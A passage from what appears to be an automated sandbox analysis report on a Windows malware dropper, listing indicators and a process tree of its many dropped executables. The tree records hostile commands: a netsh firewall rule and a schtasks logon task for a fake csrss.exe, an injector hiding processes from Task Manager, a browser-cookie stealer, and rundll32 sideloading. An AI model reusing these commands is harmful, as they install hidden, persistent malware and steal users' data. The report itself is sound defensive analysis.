Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	Graphics.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pub2.exejfiag3g_gg.exe

pid	process
4824	pub2.exe
4824	pub2.exe
5064	jfiag3g_gg.exe
5064	jfiag3g_gg.exe
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712
2712

Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

pub2.exe

pid process

4824 pub2.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

SoCleanInst.exeInstall.exeWerFault.exemd9_1sjm.exeConhost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	1224	SoCleanInst.exe
Token: SeCreateTokenPrivilege	2692	Install.exe
Token: SeAssignPrimaryTokenPrivilege	2692	Install.exe
Token: SeLockMemoryPrivilege	2692	Install.exe
Token: SeIncreaseQuotaPrivilege	2692	Install.exe
Token: SeMachineAccountPrivilege	2692	Install.exe
Token: SeTcbPrivilege	2692	Install.exe
Token: SeSecurityPrivilege	2692	Install.exe
Token: SeTakeOwnershipPrivilege	2692	Install.exe
Token: SeLoadDriverPrivilege	2692	Install.exe
Token: SeSystemProfilePrivilege	2692	Install.exe
Token: SeSystemtimePrivilege	2692	Install.exe
Token: SeProfSingleProcessPrivilege	2692	Install.exe
Token: SeIncBasePriorityPrivilege	2692	Install.exe
Token: SeCreatePagefilePrivilege	2692	Install.exe
Token: SeCreatePermanentPrivilege	2692	Install.exe
Token: SeBackupPrivilege	2692	Install.exe
Token: SeRestorePrivilege	2692	Install.exe
Token: SeShutdownPrivilege	2692	Install.exe
Token: SeDebugPrivilege	2692	Install.exe
Token: SeAuditPrivilege	2692	Install.exe
Token: SeSystemEnvironmentPrivilege	2692	Install.exe
Token: SeChangeNotifyPrivilege	2692	Install.exe
Token: SeRemoteShutdownPrivilege	2692	Install.exe
Token: SeUndockPrivilege	2692	Install.exe
Token: SeSyncAgentPrivilege	2692	Install.exe
Token: SeEnableDelegationPrivilege	2692	Install.exe
Token: SeManageVolumePrivilege	2692	Install.exe
Token: SeImpersonatePrivilege	2692	Install.exe
Token: SeCreateGlobalPrivilege	2692	Install.exe
Token: 31	2692	Install.exe
Token: 32	2692	Install.exe
Token: 33	2692	Install.exe
Token: 34	2692	Install.exe
Token: 35	2692	Install.exe
Token: SeDebugPrivilege	344	WerFault.exe
Token: SeManageVolumePrivilege	2028	md9_1sjm.exe
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeManageVolumePrivilege	2028	md9_1sjm.exe
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeShutdownPrivilege	2712
Token: SeCreatePagefilePrivilege	2712
Token: SeDebugPrivilege	2456	Conhost.exe
Token: SeImpersonatePrivilege	2456	Conhost.exe
Token: SeTcbPrivilege	2260	svchost.exe
Token: SeTcbPrivilege	2260	svchost.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

iCGcYDTklQlL5864sruYWI4l.exeByduaBYCZWTyfB3nbvNvi9Cb.exeAIOs52ptMK7ksGBBNb6S4qEp.exeoumII6Q2avjuk0Ds5DVeqcBh.exe

pid process

4900 iCGcYDTklQlL5864sruYWI4l.exe
2328 ByduaBYCZWTyfB3nbvNvi9Cb.exe
4204 AIOs52ptMK7ksGBBNb6S4qEp.exe
1252 oumII6Q2avjuk0Ds5DVeqcBh.exe

pid	process
4900	iCGcYDTklQlL5864sruYWI4l.exe
2328	ByduaBYCZWTyfB3nbvNvi9Cb.exe
4204	AIOs52ptMK7ksGBBNb6S4qEp.exe
1252	oumII6Q2avjuk0Ds5DVeqcBh.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exeFiles.exeInstall.execmd.exesvchost.exeGraphics.execmd.execsrss.exeFile.exe

description	pid	process	target process
PID 784 wrote to memory of 1224	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	SoCleanInst.exe
PID 784 wrote to memory of 1224	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	SoCleanInst.exe
PID 784 wrote to memory of 2028	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	md9_1sjm.exe
PID 784 wrote to memory of 2028	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	md9_1sjm.exe
PID 784 wrote to memory of 2028	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	md9_1sjm.exe
PID 784 wrote to memory of 2232	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Folder.exe
PID 784 wrote to memory of 2232	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Folder.exe
PID 784 wrote to memory of 2232	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Folder.exe
PID 784 wrote to memory of 2456	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Graphics.exe
PID 784 wrote to memory of 2456	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Graphics.exe
PID 784 wrote to memory of 2456	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Graphics.exe
PID 784 wrote to memory of 2664	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Updbdate.exe
PID 784 wrote to memory of 2664	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Updbdate.exe
PID 784 wrote to memory of 2664	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Updbdate.exe
PID 784 wrote to memory of 2692	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Install.exe
PID 784 wrote to memory of 2692	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Install.exe
PID 784 wrote to memory of 2692	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Install.exe
PID 784 wrote to memory of 4368	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Files.exe
PID 784 wrote to memory of 4368	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Files.exe
PID 784 wrote to memory of 4368	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	Files.exe
PID 784 wrote to memory of 4824	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	pub2.exe
PID 784 wrote to memory of 4824	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	pub2.exe
PID 784 wrote to memory of 4824	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	pub2.exe
PID 784 wrote to memory of 4248	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	File.exe
PID 784 wrote to memory of 4248	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	File.exe
PID 784 wrote to memory of 4248	784	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe	File.exe
PID 4368 wrote to memory of 1432	4368	Files.exe	jfiag3g_gg.exe
PID 4368 wrote to memory of 1432	4368	Files.exe	jfiag3g_gg.exe
PID 4368 wrote to memory of 1432	4368	Files.exe	jfiag3g_gg.exe
PID 2692 wrote to memory of 1256	2692	Install.exe	cmd.exe
PID 2692 wrote to memory of 1256	2692	Install.exe	cmd.exe
PID 2692 wrote to memory of 1256	2692	Install.exe	cmd.exe
PID 1256 wrote to memory of 344	1256	cmd.exe	WerFault.exe
PID 1256 wrote to memory of 344	1256	cmd.exe	WerFault.exe
PID 1256 wrote to memory of 344	1256	cmd.exe	WerFault.exe
PID 4368 wrote to memory of 5064	4368	Files.exe	jfiag3g_gg.exe
PID 4368 wrote to memory of 5064	4368	Files.exe	jfiag3g_gg.exe
PID 4368 wrote to memory of 5064	4368	Files.exe	jfiag3g_gg.exe
PID 2260 wrote to memory of 3848	2260	svchost.exe	Graphics.exe
PID 2260 wrote to memory of 3848	2260	svchost.exe	Graphics.exe
PID 2260 wrote to memory of 3848	2260	svchost.exe	Graphics.exe
PID 3848 wrote to memory of 3864	3848	Graphics.exe	cmd.exe
PID 3848 wrote to memory of 3864	3848	Graphics.exe	cmd.exe
PID 3864 wrote to memory of 516	3864	cmd.exe	netsh.exe
PID 3864 wrote to memory of 516	3864	cmd.exe	netsh.exe
PID 3848 wrote to memory of 1996	3848	Graphics.exe	csrss.exe
PID 3848 wrote to memory of 1996	3848	Graphics.exe	csrss.exe
PID 3848 wrote to memory of 1996	3848	Graphics.exe	csrss.exe
PID 2260 wrote to memory of 4216	2260	svchost.exe	schtasks.exe
PID 2260 wrote to memory of 4216	2260	svchost.exe	schtasks.exe
PID 1996 wrote to memory of 4840	1996	csrss.exe	injector.exe
PID 1996 wrote to memory of 4840	1996	csrss.exe	injector.exe
PID 4248 wrote to memory of 4404	4248	File.exe	40WBlCeaNLSz3n2x_zx3_34z.exe
PID 4248 wrote to memory of 4404	4248	File.exe	40WBlCeaNLSz3n2x_zx3_34z.exe
PID 4248 wrote to memory of 4900	4248	File.exe	iCGcYDTklQlL5864sruYWI4l.exe
PID 4248 wrote to memory of 4900	4248	File.exe	iCGcYDTklQlL5864sruYWI4l.exe
PID 4248 wrote to memory of 4900	4248	File.exe	iCGcYDTklQlL5864sruYWI4l.exe
PID 4248 wrote to memory of 2328	4248	File.exe	ByduaBYCZWTyfB3nbvNvi9Cb.exe
PID 4248 wrote to memory of 2328	4248	File.exe	ByduaBYCZWTyfB3nbvNvi9Cb.exe
PID 4248 wrote to memory of 2328	4248	File.exe	ByduaBYCZWTyfB3nbvNvi9Cb.exe
PID 4248 wrote to memory of 3808	4248	File.exe	LLu74zxLUwRvf6Wu4dBPkIHT.exe
PID 4248 wrote to memory of 3808	4248	File.exe	LLu74zxLUwRvf6Wu4dBPkIHT.exe
PID 4248 wrote to memory of 3808	4248	File.exe	LLu74zxLUwRvf6Wu4dBPkIHT.exe
PID 4248 wrote to memory of 3680	4248	File.exe	n9kuCWbwTpyuOMtLZUnGC8gy.exe

C:\Users\Admin\AppData\Local\Temp\9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
"C:\Users\Admin\AppData\Local\Temp\9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:784

C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe
"C:\Users\Admin\AppData\Local\Temp\SoCleanInst.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1224

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:2028

C:\Users\Admin\AppData\Local\Temp\Folder.exe
"C:\Users\Admin\AppData\Local\Temp\Folder.exe"
2⤵
- Executes dropped EXE
PID:2232

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
2⤵
- Executes dropped EXE
PID:2456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 328
3⤵
- Program crash
PID:780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 332
3⤵
- Program crash
PID:4232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 332
3⤵
- Program crash
PID:3768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 664
3⤵
- Program crash
PID:4528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 664
3⤵
- Program crash
PID:4772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 716
3⤵
- Program crash
PID:4956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 736
3⤵
- Program crash
PID:3516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 744
3⤵
- Program crash
PID:3668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 752
3⤵
- Program crash
PID:3396

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 616
3⤵
- Program crash
PID:2564

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 796
3⤵
- Program crash
PID:4224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 832
3⤵
- Program crash
PID:3572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 772
3⤵
- Program crash
PID:696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 700
3⤵
- Program crash
PID:944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 644
3⤵
- Program crash
PID:3808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 828
3⤵
- Program crash
PID:2544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 616
3⤵
- Program crash
PID:64

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 764
3⤵
- Program crash
PID:4416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 900
3⤵
- Program crash
PID:4320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 868
3⤵
- Program crash
PID:4352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 896
3⤵
- Program crash
PID:1328

C:\Users\Admin\AppData\Local\Temp\Graphics.exe
"C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:3848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 292
4⤵
- Program crash
PID:5056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 296
4⤵
- Program crash
PID:412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 296
4⤵
- Program crash
PID:1876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 568
4⤵
- Program crash
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 668
4⤵
- Program crash
PID:3008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 668
4⤵
- Program crash
PID:4600

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 700
4⤵
- Program crash
PID:2592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 708
4⤵
- Program crash
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 700
4⤵
- Program crash
PID:2084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 660
4⤵
- Program crash
PID:2796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 680
4⤵
- Program crash
PID:2420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 828
4⤵
- Program crash
PID:1096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 848
4⤵
- Program crash
PID:4340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 852
4⤵
- Program crash
PID:4772

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 932
4⤵
- Program crash
PID:2192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3848 -s 836
4⤵
- Program crash
PID:4880

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
4⤵
- Suspicious use of WriteProcessMemory
PID:3864

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2456

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
5⤵
PID:516

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /202-202
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 328
5⤵
- Program crash
PID:1644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 332
5⤵
- Program crash
PID:2372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 332
5⤵
- Program crash
PID:4616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 664
5⤵
- Program crash
PID:4232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 668
5⤵
- Program crash
PID:3136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 668
5⤵
- Program crash
PID:2704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 732
5⤵
- Program crash
PID:3724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 740
5⤵
- Program crash
PID:4676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 760
5⤵
- Program crash
PID:4660

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 788
5⤵
- Program crash
PID:64

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 600
5⤵
- Program crash
PID:4252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 872
5⤵
- Program crash
PID:3424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 872
5⤵
- Program crash
PID:4648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 872
5⤵
- Program crash
PID:436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 872
5⤵
- Program crash
PID:3672

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
5⤵
- Creates scheduled task(s)
PID:4216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 976
5⤵
- Program crash
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 980
5⤵
- Program crash
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 964
5⤵
- Program crash
PID:1328

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 1056
5⤵
- Program crash
PID:3096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 1132
5⤵
- Program crash
PID:3292

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 1148
5⤵
- Program crash
PID:1756

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 1104
5⤵
- Program crash
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 1184
5⤵
- Program crash
PID:2784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 1184
5⤵
- Program crash
PID:3452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 1128
5⤵
- Program crash
PID:3476

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
5⤵
- Executes dropped EXE
PID:4840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 1256
5⤵
PID:1368

C:\Users\Admin\AppData\Local\Temp\Install.exe
"C:\Users\Admin\AppData\Local\Temp\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2692

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:1256

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
PID:344

C:\Users\Admin\AppData\Local\Temp\Updbdate.exe
"C:\Users\Admin\AppData\Local\Temp\Updbdate.exe"
2⤵
- Executes dropped EXE
PID:2664

C:\Users\Admin\AppData\Local\Temp\Files.exe
"C:\Users\Admin\AppData\Local\Temp\Files.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4368

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
PID:1432

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5064

C:\Users\Admin\AppData\Local\Temp\pub2.exe
"C:\Users\Admin\AppData\Local\Temp\pub2.exe"
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4824

C:\Users\Admin\AppData\Local\Temp\File.exe
"C:\Users\Admin\AppData\Local\Temp\File.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4248

C:\Users\Admin\Pictures\Adobe Films\40WBlCeaNLSz3n2x_zx3_34z.exe
"C:\Users\Admin\Pictures\Adobe Films\40WBlCeaNLSz3n2x_zx3_34z.exe"
3⤵
- Executes dropped EXE
PID:4404

C:\Users\Admin\Pictures\Adobe Films\iCGcYDTklQlL5864sruYWI4l.exe
"C:\Users\Admin\Pictures\Adobe Films\iCGcYDTklQlL5864sruYWI4l.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4900

C:\Users\Admin\Documents\E3z8tOoWez0Y6pDmrn6JqtoT.exe
"C:\Users\Admin\Documents\E3z8tOoWez0Y6pDmrn6JqtoT.exe"
4⤵
PID:5328

C:\Users\Admin\Pictures\Adobe Films\fdg531nY6kgf7bJM15elutXi.exe
"C:\Users\Admin\Pictures\Adobe Films\fdg531nY6kgf7bJM15elutXi.exe"
5⤵
PID:4400

C:\Users\Admin\Pictures\Adobe Films\Yy1BrFHKmLl5JsrH992zNixR.exe
"C:\Users\Admin\Pictures\Adobe Films\Yy1BrFHKmLl5JsrH992zNixR.exe"
5⤵
PID:6080

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\a6U_WGm.9B
6⤵
PID:5280

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
7⤵
PID:5940

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\a6U_WGm.9B
8⤵
PID:5648

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\a6U_WGm.9B
9⤵
PID:4616

C:\Users\Admin\Pictures\Adobe Films\WQloRYkp4ovmNUlnnmpgrUBE.exe
"C:\Users\Admin\Pictures\Adobe Films\WQloRYkp4ovmNUlnnmpgrUBE.exe"
5⤵
PID:5536

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5536 -s 616
6⤵
PID:5304

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5536 -s 624
6⤵
PID:3380

C:\Users\Admin\Pictures\Adobe Films\sW_8XbNAhY2RR1HBdj1m2vAH.exe
"C:\Users\Admin\Pictures\Adobe Films\sW_8XbNAhY2RR1HBdj1m2vAH.exe"
5⤵
PID:3628

C:\Users\Admin\AppData\Local\Temp\7zSB212.tmp\Install.exe
.\Install.exe
6⤵
PID:5900

C:\Users\Admin\AppData\Local\Temp\7zS320.tmp\Install.exe
.\Install.exe /S /site_id "525403"
7⤵
PID:3468

C:\Users\Admin\Pictures\Adobe Films\5MAwzjPUEb9Q4oirKSXFWSgd.exe
"C:\Users\Admin\Pictures\Adobe Films\5MAwzjPUEb9Q4oirKSXFWSgd.exe"
5⤵
PID:824

C:\Users\Admin\Pictures\Adobe Films\l_4jrJG8nhgzD_1hLB9GIfIL.exe
"C:\Users\Admin\Pictures\Adobe Films\l_4jrJG8nhgzD_1hLB9GIfIL.exe"
5⤵
PID:5456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 944
6⤵
PID:5332

C:\Users\Admin\Pictures\Adobe Films\LFajJwgdklFWblrQaecncS75.exe
"C:\Users\Admin\Pictures\Adobe Films\LFajJwgdklFWblrQaecncS75.exe"
5⤵
PID:3308

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
6⤵
PID:4892

C:\Users\Admin\AppData\Local\Temp\FEE85.exe
"C:\Users\Admin\AppData\Local\Temp\FEE85.exe"
7⤵
PID:3704

C:\Users\Admin\AppData\Local\Temp\52LI1.exe
"C:\Users\Admin\AppData\Local\Temp\52LI1.exe"
7⤵
PID:5136

C:\Users\Admin\AppData\Local\Temp\G9CLG.exe
"C:\Users\Admin\AppData\Local\Temp\G9CLG.exe"
7⤵
PID:5588

C:\Users\Admin\AppData\Local\Temp\D4I8C.exe
"C:\Users\Admin\AppData\Local\Temp\D4I8C.exe"
7⤵
